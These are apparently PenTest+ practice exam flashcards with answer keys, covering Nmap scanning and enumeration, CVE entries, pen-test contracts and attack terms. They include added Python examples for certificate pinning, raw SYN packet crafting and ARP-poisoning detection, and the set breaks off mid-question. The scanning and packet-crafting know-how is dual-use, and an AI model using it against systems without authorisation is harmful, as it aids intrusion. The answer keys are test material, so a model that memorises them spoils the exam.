Cybrary Practice Exam Flashcards

1
Q

You have run an automated scan against the network at InterConn and found a number of vulnerabilities.
In an instance of LibreOffice Writer, you copy the vulnerabilities and look them up on https://cve.mitre.org/cve/ to see if you can find anything already reported on them.

For one of the vulnerabilities the response comes back

CVE-2019-17554

With a Date Entry created:

20191014

What does the Date Entry Created value above NOT indicate? (CHOOSE THREE)

A.Discovered
B.Shared with vendor
C.Reserved
D.Disclosed publicly
E.Allocated
A

A.Discovered
B.Shared with vendor
D.Disclosed publicly

Explanation:
The entry does NOT indicate the vulnerability is discovered, publicly disclosed or shared with the vendor.

According to CVE:
“CVE IDs are used by cybersecurity product/service vendors and researchers as a standard method for identifying vulnerabilities and for cross-linking with other repositories that also use CVE IDs.

This date does not indicate when the vulnerability was discovered, shared with the affected vendor, publicly disclosed or updated in CVE.

That information may or may not be included in the description or references of a CVE Entry or in the enhanced information for the CVE Entry that is provided in the U.S. National Vulnerability Database (NVD).”

The “Date Entry Created” date in a CVE Entry indicates when the CVE ID was issued to a CVE Numbering Authority (CNA) or the CVE Entry was published on the CVE List.

“A CVE Entry is marked as “RESERVED” when it has been reserved for use by a CVE Numbering Authority (CNA) or security researcher, but the details of it are not yet populated. A CVE Entry can change from the RESERVED state to being populated, or Allocated, at any time based on a number of factors both internal and external to the CVE List. Once the CVE Entry is populated with details on the CVE List, it will become available in the U.S. National Vulnerability Database (NVD)”.

This particular entry has been allocated because all of the information has been populated. It is also reserved because it has been assigned to a particular vulnerability.

Common Vulnerabilities and Exposures (CVE) is a list of common identifiers for publicly known cybersecurity vulnerabilities. With a standardized identifier and description for each vulnerability or exposure, it is more of a dictionary than a database. CVE itself does not rank vulnerabilities (severity scores such as CVSS are added by the NVD) and does not provide security compliance standards.

Objective:
Information Gathering and Vulnerability Identification

Sub-Objective:
Given a scenario, analyze vulnerability scan results.

References:

CompTIA PenTest+ Cert Guide, Chapter 3: Information Gathering and Vulnerability Identification, Understanding How to Analyze Vulnerability Scan Results

2
Q

A penetration tester wants to run an Nmap script that will use MSRPC to enumerate user accounts on a target. Which script would be best for this scenario?

A.smb-enum-shares.nse
B.http-enum.nse
C.smb-enum-services.nse
D.smb-enum-users.nse

A

D.smb-enum-users.nse

Explanation:
The smb-enum-users.nse script enumerates the user accounts on a remote Windows system. It uses the Microsoft Remote Procedure Call (MSRPC) protocol, carried over SMB, to perform the reconnaissance. MSRPC is Microsoft's implementation of RPC, a client-server protocol that lets a program request a service from a program on another machine without knowing the details of that machine or the network between them. From a pen test perspective, the information gained this way allows testers to map the internal environment and footprint the specific users that exist on a remote system.

The smb-enum-shares.nse script retrieves information about remote shares. Readable shares can expose private files, which is an opportunity for data exfiltration or malware propagation.

The smb-enum-services.nse script lists the services running on a remote system, including each service's status (running or stopped). It requires credentials with administrative rights on the target.

The http-enum.nse script enumerates directories and files used by common web applications and servers. It matches responses against a fingerprint database so that it can identify specific applications and versions rather than merely reporting that a path exists, which keeps false positives low but does not eliminate them.

3
Q

Which of these options is NOT a risk management process?

A.Taking a new business risk
B.Monitoring an existing risk
C.Accepting the current level of risk
D.Determining the organization’s tolerance for risk
E.Taking action to reduce risk
F.Calculating the current level of risk
A

A.Taking a new business risk

Explanation:
Taking a business risk is not a risk management process. It is the reason for risk management. All business activities carry some level of risk that must be faced to achieve rewards. Risk management is the attempt to ensure the business will benefit from potentially risky activities, such as managing customers’ financial data or acquiring new computer systems, without too much harm.

Determining the current level of risk faced by an organization, judging the organization’s appetite or tolerance for risk, accepting the current level of risk, and taking action to mitigate or avoid risk are all part of a risk management program.

Responding to an identified risk uses a combination of these strategies:

Risk monitoring, by continually gauging the current risks faced by the organization
Risk avoidance, by modifying or stopping an activity or process that generates risk
Risk reduction, by implementing countermeasures to protect against risk (such as cybersecurity)
Risk sharing, by spreading the impact of the risk to another entity (such as hiring an outside firm to provide cybersecurity to the organization)
Risk transference, by shifting the impact of the risk to another entity (such as buying insurance)

Compliance liability, which is defined by laws and regulations such as GLBA and HIPAA / HITECH and by industry standards such as PCI DSS, cannot be shared or transferred away from the organization. Organizations subject to these mandates remain responsible for complying with them even when the work is outsourced or insured; the liability itself cannot be shared or transferred.

4
Q

In a workstation you just gained remote access to, you find the following code:

super_list = [12, 21, 95, 45, 8, 100]
for number in super_list:        # walk the list in order
    if number % 2 != 0:          # odd numbers leave a remainder when divided by 2
        print(number)

What is the first output?

A.45
B.21
C.12
D.95

A

B.21

Explanation:
The first output of this code is 21. This code determines which numbers within the list are odd. The for loop loops through the numbers within the list. The if statement then determines whether or not the number is evenly divisible by two. If it is not (meaning that the number is an odd number), then the number prints.

The first output is not 12 because 12 is an even number.

The first output is not 95, which will be the second output.

The first output is not 45, which will be the third output.

The code will provide output as follows: 21, 95, 45.

5
Q

A penetration tester performs a security assessment for your company. When you examine the final report, seven vulnerabilities are listed. Four of the vulnerabilities are critical. However, your company does not have the resources to remediate all of the vulnerabilities listed in the report at the moment. You need to suggest which vulnerabilities should be addressed.

What should you recommend?

A.Implement the remediation for the most critical vulnerability first.
B.Implement the cheapest remediations first.
C.Implement the remediations that are easiest to implement first.
D.Implement the remediations that affect the most assets first.

A

A.Implement the remediation for the most critical vulnerability first.

Explanation:
You should recommend that the company implement the remediation for the most critical vulnerability first. The criticality of a vulnerability is based on a number of factors, including ease of exploitation, value of the affected asset, exposure of the affected asset, and so on. Critical vulnerabilities should be handled first when only limited resources are available.

You should not implement the cheapest remediations first. Although this would allow your resources to be stretched, it would not ensure that the most critical vulnerabilities are addressed. The most critical vulnerabilities are those most likely to be exploited and most likely to cost the most if exploited.

You should not implement the remediations that affect the most assets first. While these remediations would seem like a logical choice because of the number of affected assets, these may not be the most critical. The most critical vulnerabilities should always have priority.

You should not implement the remediations that are easiest to implement first. Just because they are easy is not reason enough to implement them first. Often the easiest remediations are not addressing the most critical vulnerabilities. Always address the most critical first.

6
Q

You are working for a contracting company that was employed by the federal government. Which organization’s publications are likely to be most closely related to your security compliance standards?

A.NIST
B.CVE
C.JPCERT
D.US-CERT

A

A.NIST

Explanation:
The National Institute of Standards and Technology (NIST) is an agency of the U.S. Department of Commerce. Its mission is to promote U.S. innovation and industrial competitiveness, and its Special Publications (the SP 800 series, such as SP 800-53 on security controls, SP 800-37 on the Risk Management Framework, and SP 800-171 on protecting controlled unclassified information in contractor systems) define the security and risk-management requirements that federal agencies and their contractors must meet. Their publications will therefore be most closely related to your security compliance standards.

Japan Computer Emergency Response Team (JPCERT) coordinates with Japanese network service providers, security vendors, and government agencies to provide incident response. They also gather and disseminate technical information on computer security incidents and vulnerabilities and security fixes, and other security information, as well as issue alerts and warnings.

The U.S. Computer Emergency Readiness Team (US-CERT) is an organization that was established by the U.S. Department of Homeland Security to analyze and reduce cyber threats and vulnerabilities, disseminate cyber threat warning information, and coordinate incident response activities. However, they do not provide security compliance standards.

Common Vulnerabilities and Exposures (CVE) is a list of common identifiers for publicly known cybersecurity vulnerabilities. With a standardized identifier and description for each vulnerability or exposure, it is more of a dictionary than a database. CVE itself does not rank vulnerabilities (severity scores such as CVSS come from the NVD) and does not provide security compliance standards.

7
Q

A penetration tester has been hired to perform a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five of them identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Which of the following would be the BEST suggestion for the client?

A.Implement the least impactful of the critical vulnerabilities’ remediations first, and then address other critical vulnerabilities
B.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time.
C.Identify the issues that can be remediated most quickly and address them first.
D.Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.

A

B.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time.

Explanation:
The client should fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time. Correcting the most critical vulnerability would prevent an attacker from remotely compromising a system easily and possibly obtaining full control.

If the startup firm corrected the least impactful, quickest, or easiest vulnerabilities first, an attacker might still be able to take control of systems and steal sensitive information, because the most critical vulnerabilities would remain unaddressed.

8
Q

Which of the following attacks can be prevented by properly shredding all sensitive documents?

A.Fence Jumping
B.Dumpster Diving
C.Tailgating
D.Piggybacking

A

B.Dumpster Diving

Explanation:
Dumpster diving occurs when someone goes through the trash in the dumpster looking for printed matter that might be helpful in an attack, such as network diagrams, phone lists, and organizational charts. It is best addressed by shredding all sensitive documents.

Piggybacking cannot be prevented by shredding all sensitive documents. Piggybacking is a social engineering attack that involves entering a facility which you are not authorized to enter by doing so when an authorized person opens the door using their credentials stored on a key card.

Fence jumping cannot be prevented by shredding all sensitive documents. This can only be done by making the fence tall enough to discourage a determined attacker. Another option is to have the top of the fence strung with razor wire.

Tailgating cannot be prevented by shredding all sensitive documents. Often you will see the terms piggybacking and tailgating used synonymously. However, there is a subtle difference between the two. Piggybacking implies that the person who has opened the door with their credentials knows the individual following them in through the secure door. Tailgating means that an individual following through the door is unknown by the person with credentials.

9
Q

You want to share the results of your Nmap with other members of your team. Which parameter stores scan results in Normal, XML, and Grep-able formats?

A.-oG
B.-oA
C.-oX
D.-oN

A

B.-oA

Explanation:
The -oA <basename> parameter of Nmap stores output in Normal, XML, and Grep-able formats all at once, writing <basename>.nmap, <basename>.xml and <basename>.gnmap. This is the usual choice when results will be shared, because each teammate can pick the form their tooling expects.

The -oX parameter of the Nmap command writes XML output. XML is easily parsed by software, which makes it the preferred format for feeding results into other tools and reports.

The -oN parameter of the Nmap command writes normal output, the same text Nmap prints to the terminal. It is meant for a human to read and analyze.

The -oG parameter of the Nmap command writes Grep-able output, one host per line. This format is easy to manipulate with simple Unix tools such as grep, awk and cut, although Nmap's own reference guide marks it as deprecated in favour of XML for anything beyond quick one-liners.

10
Q

Which of the following is NOT likely to be carried out after a penetration test is completed?

A.Remove the tools installed during the test.
B.Remove accounts created for the test.
C.Disable all services used during the test.
D.Remove shells created during the test.

A

C.Disable all services used during the test.

Explanation:
Disabling all services used during the test is NOT likely to be carried out after a penetration test is completed. You should only disable those services that were explicitly enabled for the penetration test. All other services will likely be valid services running in the enterprise.

You should perform the following actions after completing a penetration test:

Remove shells created during the test.
Remove accounts created for the test.
Remove the tools installed during the test.
11
Q

Recently you heard of an organization that suffered a man-in-the-middle attack leveraging fake certificates. You would like to use a technique that always verifies that the name on the certificate matches the name of the system attempting to use the certificate. What is this technique called?

A.DNSSEC
B.OCSP
C.certificate pinning
D.wildcard certificates

A

C.certificate pinning

Explanation:
Certificate pinning is a technique performed by a software client to protect against man-in-the-middle attacks that use fraudulently issued certificates. Ordinary TLS validation already checks that the host name matches the certificate and that the chain leads to a trusted CA; pinning goes further by hard-coding (or recording on first use) which certificate, public key or issuing CA is acceptable for a given host, so that a certificate from any other issuer, even a publicly trusted one, is rejected.

Domain Name System Security Extensions (DNSSEC) is a set of extensions to DNS that adds additional checks to name resolution. DNSSEC adds two important features to the DNS protocol, but does not prevent certificate issues:

Data origin authentication
Data integrity protection 

Wildcard certificates are used to certify the identity of hosts in multiple sub-domains of a domain with a single certificate. They do not enhance certificate security; if anything, the shared private key means a compromise on one host exposes every host that uses it.

Online Certificate Status Protocol (OCSP) is an Internet protocol used to check the status of a certificate in real time, as opposed to using CRLs. It does not address the certificate issues described in the scenario.
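The pin check itself is small, and the details matter (constant-time comparison, failing closed when no pin exists, keeping a backup pin so a certificate rotation does not lock clients out). Here is an added example in Python, not from the flashcards or any library, that pins the SHA-256 fingerprint of the leaf certificate's DER encoding. The certificate bytes and the host name example.test are constructed placeholders; connect_pinned() shows where the check sits in a real client and is not exercised offline.

```python
import hashlib
import hmac
import socket
import ssl

# Constructed stand-ins for DER-encoded certificates (not real X.509 data). In practice the
# pinned value is taken from the server's actual certificate, e.g. the output of
# `openssl x509 -in cert.pem -noout -fingerprint -sha256`, plus a backup pin for the
# certificate that will replace it.
CONSTRUCTED_CERT_DER = b"\x30\x82\x01\x00CONSTRUCTED-LEAF-CERT-FOR-example.test"
BACKUP_CERT_DER = b"\x30\x82\x01\x00CONSTRUCTED-BACKUP-CERT-FOR-example.test"


def fingerprint(der_bytes):
    """SHA-256 of the DER-encoded certificate as lowercase hex (the openssl fingerprint without colons)."""
    return hashlib.sha256(der_bytes).hexdigest()


# Pin store: host name -> set of acceptable fingerprints. Current cert plus a backup.
PINS = {
    "example.test": {fingerprint(CONSTRUCTED_CERT_DER), fingerprint(BACKUP_CERT_DER)},
}


class PinMismatch(Exception):
    """Raised when the presented certificate matches none of the pins for the host."""


def check_pin(hostname, presented_der):
    """Accept only if the presented certificate's fingerprint is pinned for this host.

    Fails closed: a host with no pin is rejected rather than silently falling back to
    plain CA validation. Comparison uses compare_digest to avoid timing leaks.
    """
    pinned = PINS.get(hostname)
    if not pinned:
        raise PinMismatch(f"no pin configured for {hostname}")
    presented = fingerprint(presented_der)
    if not any(hmac.compare_digest(presented, p) for p in pinned):
        raise PinMismatch(f"certificate for {hostname} ({presented[:16]}...) matches no pin")
    return True


def connect_pinned(hostname, port=443, timeout=5.0):
    """Open a TLS connection with normal CA and host-name validation, then enforce the pin too.

    Illustrative only; not run offline.
    """
    ctx = ssl.create_default_context()  # chain validation + host-name check still apply
    with socket.create_connection((hostname, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=hostname) as tls:
            check_pin(hostname, tls.getpeercert(binary_form=True))
            return tls.version()


if __name__ == "__main__":
    print(check_pin("example.test", CONSTRUCTED_CERT_DER))
    # A certificate from any other issuer, even a trusted CA, is rejected:
    try:
        check_pin("example.test", b"\x30\x82\x01\x00MITM-CERT-FROM-A-DIFFERENT-CA")
    except PinMismatch as exc:
        print("rejected:", exc)
```

Pinning the whole leaf certificate means every renewal changes the fingerprint, which is why the store carries a backup pin and why many clients pin the public key (SPKI) instead, so a renewal that keeps the same key pair needs no client update. Either way the pin is an addition to, never a replacement for, the standard chain and host-name checks.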

12
Q

To perform network reconnaissance, you use Nmap to perform a SYN scan. After completing this scan, you want to create more custom packets and gain more control over the traffic you are sending. Which tool should you use to do this?

A.DNSrecon
B.Scapy
C.Metasploit
D.Recon-ng

A

B.Scapy

Explanation:
Scapy is a Python-based packet manipulation tool that lets users build, modify, send, sniff and dissect network packets layer by layer. It gives the user control over every field of the packets being sent, which Nmap's fixed scan types do not.

Recon-ng is a modular framework built for the initial reconnaissance phase of an offensive security exercise. With Recon-ng you can configure options, run recon modules and output results to different report types.

Metasploit is a framework used in penetration testing to find and exploit vulnerabilities on networks and servers.

DNSrecon is a tool used for DNS-oriented information gathering. It can perform various enumerations, such as zone transfers, domain brute force, and wildcard resolution.
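What "more control over the packets" means in practice is being able to set every header field yourself. As an added example (not from the flashcards or from the Scapy project), the following builds an IPv4/TCP SYN by hand with only the Python standard library, including the IP header checksum and the TCP checksum over the pseudo-header, and verifies them the way a receiver would. Addresses and ports are hypothetical. In Scapy the same packet is `IP(src=..., dst=...)/TCP(sport=..., dport=80, flags="S", options=[("MSS", 1460)])`; this shows what that one line does underneath.

```python
import socket
import struct


def inet_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words; an odd trailing byte is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                         # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src, dst, payload_len, proto=socket.IPPROTO_TCP, ttl=64, ident=0x1234):
    """20-byte IPv4 header (no options) with DF set and a valid header checksum."""
    ver_ihl = (4 << 4) | 5                     # version 4, IHL 5 words
    flags_frag = 0x4000                        # DF, fragment offset 0
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, 20 + payload_len, ident, flags_frag,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def build_tcp_syn(src, dst, sport, dport, seq=0, window=64240, options=b""):
    """TCP header with only SYN set; the checksum covers the IPv4 pseudo-header (RFC 793)."""
    if len(options) % 4:
        raise ValueError("TCP options must be padded to a multiple of 4 bytes")
    data_offset = (20 + len(options)) // 4
    flags = 0x02                               # SYN
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, data_offset << 4, flags, window, 0, 0)
    hdr += options
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                         0, socket.IPPROTO_TCP, len(hdr))
    return hdr[:16] + struct.pack("!H", inet_checksum(pseudo + hdr)) + hdr[18:]


def craft_syn(src, dst, sport, dport, options=b""):
    """Complete IPv4+TCP SYN datagram, ready for a raw socket (IP_HDRINCL) or a pcap writer."""
    tcp = build_tcp_syn(src, dst, sport, dport, options=options)
    return build_ipv4_header(src, dst, len(tcp)) + tcp


def verify_checksums(packet):
    """Receiver-side check: re-summing a header that already carries its checksum yields 0."""
    ip_hdr, tcp = packet[:20], packet[20:]
    pseudo = struct.pack("!4s4sBBH", ip_hdr[12:16], ip_hdr[16:20], 0, socket.IPPROTO_TCP, len(tcp))
    return inet_checksum(ip_hdr) == 0 and inet_checksum(pseudo + tcp) == 0


if __name__ == "__main__":
    # An MSS option (kind 2, length 4, 1460) makes the SYN look like a normal host's
    # rather than a bare scanner packet; this is the kind of field a fixed scan type hides.
    pkt = craft_syn("192.168.1.10", "192.168.1.1", 40000, 80, options=b"\x02\x04\x05\xb4")
    print(pkt.hex(), verify_checksums(pkt))
    # Sending requires a raw socket and root, e.g. on Linux (not run here):
    # s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    # s.sendto(pkt, ("192.168.1.1", 0))
```

Because the kernel will answer an unsolicited SYN/ACK to a port it never opened with a RST, real tooling either filters that with iptables or reads the reply with a sniffer before the kernel acts on it; Scapy's sr()/sr1() hide that detail as well.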

13
Q

You are attempting to execute an SNMP sweep. After identifying the correct SNMP community string, you find that several live systems do not respond.

Which of the following is NOT a reason a device may not respond?

A.The system is firewalled.
B.The system is offline.
C.An incorrect community string is being used.
D.The TCP three-way handshake is not completing.

A

D.The TCP three-way handshake is not completing.

Explanation:
Simple Network Management Protocol (SNMP) does not use the TCP protocol. Therefore, a failure of the three-way handshake is not a possible reason a device may not respond. SNMP uses UDP, not TCP.

Valid reasons why a system may not respond are:

An incorrect community string is being used.
The system is offline.
The system is firewalled.
The SNMP service is disabled.
14
Q

You want to engage a pen testing company for a series of tests to be performed over the next two years. You do not want to negotiate with the company for each individual test. What type of document could you execute?

A.NDA
B.SOW
C.MSA
D.Rules of Engagement

A

C.MSA

Explanation:
A master services agreement (MSA) is used to set the parameters for ongoing tests, each of which then gets its own SOW. Having an MSA on file means that penetration testers do not need to renegotiate terms for every test with established clients, and that companies can quickly create new SOWs with an established pen testing organization.

The statement of work (SOW) defines a number of details concerning a pen test, and must be unique to every pen test performed. It includes:

Timelines, including the report delivery schedule
Scope of the work to be performed
Location of the work (geographic location or network location)
Technical and nontechnical requirements
Cost of the penetration tests
Payment schedule

The non-disclosure agreement (NDA), which is signed by the tester, requires the tester to keep all company information private. It does not address the details of individual tests.

The rules of engagement specify the allowed actions and allowed targets for an individual test. Its parameters are more specific than those contained in an MSA.

15
Q

A network security analyst for the U.S Department of Defense (DoD) is looking to gain information about a foreign adversary. What method should be used FIRST to collect and analyze information on this target?

A.Packet crafting
B.OSINT
C.Vulnerability Scanning
D.Port Scanning

A

B.OSINT

Explanation:
Open source intelligence (OSINT) refers to information collection without the need for any covert methods. This is often a good first step in reconnaissance or threat hunting. Typically, the information could be found on the Internet, and this type of collection can often start with a simple Google search.

Vulnerability scanning is running a tool against a target to see what vulnerabilities, or weaknesses, it may hold. A scanner will often actually use a tool like Nmap to perform the port scan process.

Packet crafting is the process of generating packets to test network devices. Packets are crafted to test IDS, TCP, Firewall, etc. It also helps to find inconsistencies and poor network protocol implementations.

Port scanning is a method to look for open, closed, or filtered ports. An open port represents an avenue into a network. That’s why it’s important to close any unnecessary or unused ports as part of the system hardening process.

16
Q

You performed a pen test for a retail organization that processes credit card information. During the test you identified several sensitive credit card items were stored with other data that was widely available to users. What concept required by PCI-DSS would rectify this situation?

A.intrusion prevention systems
B.next generation firewalls
C.network segmentation
D.key management

A

C.network segmentation

Explanation:
Network segmentation isolates the systems that store, process or transmit cardholder data (the cardholder data environment) from the rest of the network. PCI DSS treats this data isolation as a key control: sensitive cardholder data such as PANs must be kept apart from data that ordinary users can reach, so that a breach elsewhere on the network does not put every sensitive item within easy reach.

In general, when dealing with any compliance-based pen test, the penetration tester should verify the presence of the following best practices:

Data isolation
Secure key management
Proper password policies

While next generation firewalls and intrusion prevention systems are certainly an advisable addition to any network holding sensitive data, neither is specifically required by PCI-DSS. The main goals of the PCI-DSS standard are as follows:

Build and Maintain a Secure Network
Protect Cardholder Data
Maintain a Vulnerability Management Program
Implement Strong Access Control Measures
Regularly Monitor and Test Networks
Maintain an Information Security Policy
17
Q

Your company carries out a penetration test on a regular basis. You are currently reviewing the report from the most recent penetration test. However, you recognize most of the findings as those that were reported in the last penetration test report. What does this indicate?

A.Different tools were used to perform the most recent penetration test.
B.The appropriate mitigations for the vulnerabilities were not deployed after the last penetration test.
C.The current penetration test was not properly completed.
D.A different contractor was used to perform the most recent penetration test.

A

B.The appropriate mitigations for the vulnerabilities were not deployed after the last penetration test.

Explanation:
If you recognize most of the findings in the report as those that were reported in the last penetration test report, then the appropriate mitigations for the vulnerabilities were not deployed after the last penetration test. If the mitigations had been deployed, the majority, if not all, of those vulnerabilities should be absent from the most recent report.

Using a different contractor or different tools would not cause the same vulnerabilities to show up. Often different contractors and tools are used to increase the likelihood that all vulnerabilities are discovered.

Discovering many of the same vulnerabilities as the last penetration test is not an indication that the penetration test was not properly completed. An improperly completed test is likely to show few to no vulnerabilities.

After completing a penetration test and reviewing the results, it is important for a company to ensure that mitigations are deployed for the vulnerabilities reported in the findings section. Failure to do so is negligent and can result in legal issues. Companies should implement a time frame wherein all mitigations should be implemented.

18
Q

You want to detect the services running on a targeted host. Which of the following is the correct Nmap command?

A.nmap -sU -T4 192.168.1.1
B.nmap -sV -T4 192.168.1.1
C.nmap -sS -T4 192.168.1.1
D.nmap -sT -T4 192.168.1.1

A

B.nmap -sV -T4 192.168.1.1

Explanation:
The Nmap service and version detection option is -sV. After finding open ports, Nmap probes each one to identify the listening service and, where possible, the product and version (for example, which mail or DNS server software is running). Knowing the exact version helps determine which exploits a server may be vulnerable to.

The -sS parameter of the Nmap command performs a SYN ("half-open") scan. It sends a TCP SYN and classifies the port from the response (SYN/ACK for open, RST for closed, no reply or an ICMP unreachable for filtered) without completing the handshake. It is the default scan type when Nmap runs with raw-packet privileges.

The -sT parameter of the Nmap command performs a TCP connect scan, which completes the full three-way handshake through the operating system's connect() call. It is the default when the user lacks permission to send raw packets, and is otherwise avoided because a completed connection is more likely to be logged by the target service.

The -sU parameter of the Nmap command performs a UDP scan. It is used to find services such as DNS, SNMP, and DHCP, all of which communicate over UDP.

19
Q

A large retail company has hired a white-hat hacker to perform testing in order to detect vulnerabilities in the system. What technique would this hacker use to gather information in the most discreet manner possible?

A.Passive reconnaissance
B.OSINT
C.Active reconnaissance
D.Topology

A

A.Passive reconnaissance

Explanation:
Passive reconnaissance is a method of gathering information without interacting directly with the target system, leaving little or no trace. This includes activities such as gleaning information from publicly available resources.

Active reconnaissance is a method which requires the tester to interact with a target system in order to gain information. This method can be very helpful, but there is risk of detection.

While open source intelligence (OSINT) is frequently used in passive reconnaissance, it describes the kind of information collected rather than a reconnaissance method. A company's public web presence can be used to gather more information about a target. For example, the tester can search a public website for key employees' names and positions, employee emails and other contact information, or technical job openings which may reveal the type of network equipment in use. All of these details aid the tester in passive reconnaissance and later exploitation.

The network topology is a byproduct that will be learned about during the process of reconnaissance but it is not a reconnaissance technique itself.

20
Q

The board is discussing the benefits of having a pen test performed. One of the members is concerned that the danger of the pen tester leaking information may outweigh the benefits of the test. What document could help allay these fears?

A.Permission to test document
B.SOW
C.NDA
D.MSA

A

C.NDA

Explanation:
The non-disclosure agreement (NDA), signed by the tester, requires the tester to keep all company information private.

The permission to test document is a critical document that explicitly authorizes you to attempt to penetrate the client’s network, system, or devices. These documents typically include the dates for which the permission is valid, the locations and types of systems to be penetrated, and the full title of the person authorized to grant permission. Its purpose is not to address confidentiality.

A master services agreement (MSA) is used to set the parameters for ongoing tests, each of which then gets its own SOW. Having an MSA on file means that penetration testers do not need to renegotiate terms for every test with established clients, and that companies can quickly create new SOWs with an established pen testing organization.

The statement of work (SOW) defines a number of details concerning a pen test, and must be unique to every pen test performed. It includes:

Timelines, including the report delivery schedule
Scope of the work to be performed
Location of the work (geographic location or network location)
Technical and nontechnical requirements
Cost of the penetration tests
Payment schedule
21
Q
  1. occurs when a hacker intercepts messages from a sender, modifies those messages, and sends them to a legitimate receiver
  2. occurs when IP addresses and host names are given out with the goal of traffic diversion
  3. occurs when a hacker tries all possible values for such variables as user names and passwords
  4. occurs when a combination of Internet Protocol (IP) spoofing and Internet Control Message Protocol (ICMP) messages saturates a network

A. Brute force attack
B. DNS poisoning
C. Man-in-the-middle attack
D. Smurf

A
  1. C
  2. B
  3. A
  4. D

The attacks should be matched with the descriptions in the following manner:

Brute force attack - occurs when a hacker tries all possible values for such variables as user names and passwords
DNS poisoning - occurs when IP addresses and host names are given out with the goal of traffic diversion
Man-in-the-middle attack - occurs when a hacker intercepts messages from a sender, modifies those messages, and sends them to a legitimate receiver
Smurf - occurs when a combination of Internet Protocol (IP) spoofing and Internet Control Message Protocol (ICMP) messages saturates a network 

DNS poisoning is similar to ARP poisoning. With ARP poisoning, an attacker sends fake (“spoofed”) Address Resolution Protocol (ARP) messages on a network with the goal of traffic diversion.
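ARP poisoning is also the most detectable of the four from the defender's side, because the spoofed replies leave a visible trail: an IP whose MAC suddenly changes, and one MAC that claims several IPs (the gateway and the victim, so the attacker can relay both directions). The following is an added example, not from the flashcards or any tool, of that detection logic run over a constructed sequence of ARP replies; the addresses are hypothetical.

```python
from collections import defaultdict

# Constructed ARP replies as (timestamp, sender_ip, sender_mac), in the order a sniffer on
# the segment would see them. Not a real capture; addresses are hypothetical.
SAMPLE_ARP_REPLIES = [
    (1.0, "192.168.1.1", "aa:bb:cc:00:00:01"),   # gateway, legitimate
    (1.5, "192.168.1.20", "aa:bb:cc:00:00:20"),  # victim workstation
    (2.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    (2.5, "192.168.1.1", "de:ad:be:ef:00:99"),   # attacker claims the gateway IP
    (3.0, "192.168.1.20", "de:ad:be:ef:00:99"),  # ...and the victim, to relay both directions
    (3.5, "192.168.1.1", "aa:bb:cc:00:00:01"),   # real gateway answers again: the mapping flaps
]


def detect_arp_poisoning(replies, known=None, allowed_multi=frozenset()):
    """Return alerts for IP->MAC changes and for MACs that claim more than one IP.

    known:         IP->MAC entries trusted before any reply is seen (e.g. the gateway from
                   DHCP lease records); otherwise the first reply for an IP is trusted,
                   which an attacker already poisoning at startup could exploit.
    allowed_multi: MACs that legitimately hold several IPs (routers, VM hosts).
    Alert tuples:  (ts, "mac_change", ip, old_mac, new_mac) or
                   (ts, "multi_ip", mac, (ip, ...), None).
    """
    ip_to_mac = dict(known or {})
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)
    alerts = []
    for ts, ip, mac in replies:
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append((ts, "mac_change", ip, previous, mac))
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:            # alert once per new IP a MAC claims
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1 and mac not in allowed_multi:
                alerts.append((ts, "multi_ip", mac, tuple(sorted(mac_to_ips[mac])), None))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES):
        print(alert)
```

A legitimate NIC replacement or DHCP re-lease also produces a single mac_change alert, so the stronger signal is the combination: a change followed by the same MAC claiming a second IP, or a mapping that flaps back and forth as the real host keeps answering. Seeding `known` with the gateway's MAC closes the first-reply-is-trusted gap for the address attackers care about most.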

22
Q

You want to employ a Linux distribution mainly aimed at network security monitoring. Which Linux distribution would BEST support network security monitoring?

A.Skadi
B.DEFT
C.ADIA
D.Security onion

A

D.Security onion

Explanation:
Security Onion is a Linux distribution mainly aimed at network security monitoring. It also has other advanced forensic analysis tools.

The answer is not Skadi. Skadi is an all-in-one solution for parsing collected data. This makes the data easily searchable and allows for the searching through multiple hosts simultaneously.

The answer is not the Appliance for Digital Investigation and Analysis (ADIA). ADIA is a VMware-based appliance that bundles many tools aimed at digital investigation and acquisition.

The answer is not the Digital Evidence and Forensics Toolkit (DEFT). This tool is a Linux distribution mainly aimed for the collection of computer forensic evidence.

23
Q

After being engaged by a client, you executed a SOW to perform a pen test. During the test, you were asked by the client to test an additional system that was not included in the original SOW. The original SOW was not revised and signed, and a new SOW was not executed. If you tested the additional system, what has occurred?

A.corruption of results
B.test dilution
C.task bleed
D.scope creep

A

D.scope creep

Explanation:
Pen tests are planned and carried out as formal projects. In project management, scope creep occurs when the original project plan is not followed precisely. It typically indicates the addition of tasks or initiatives not included in the original plan scope.

Usually when things are added to the project’s scope, it can be because the client is really happy with how it’s going. But it is essential that when this occurs, the original SOW is updated or a new one is executed to document the additional work. Also, do not be afraid to ask for additional funding when tasks are added to your scope.

Task bleed and test dilution are not terms used when discussing project management and pen tests.

24
Q

You need to perform a penetration test. You have decided to use an automated vulnerability scanner. What should you check for when the test is complete?

A.False positives
B.Speed and frequency
C.People’s feelings
D.Detection

A

A.False positives

Explanation:
A.False positives

25
Q

Communication details are contained in the penetration test’s engagement plan. One of the members of the penetration testing team wants to ensure that they understand the appropriate communication triggers.

Which of the following is NOT a communication trigger?
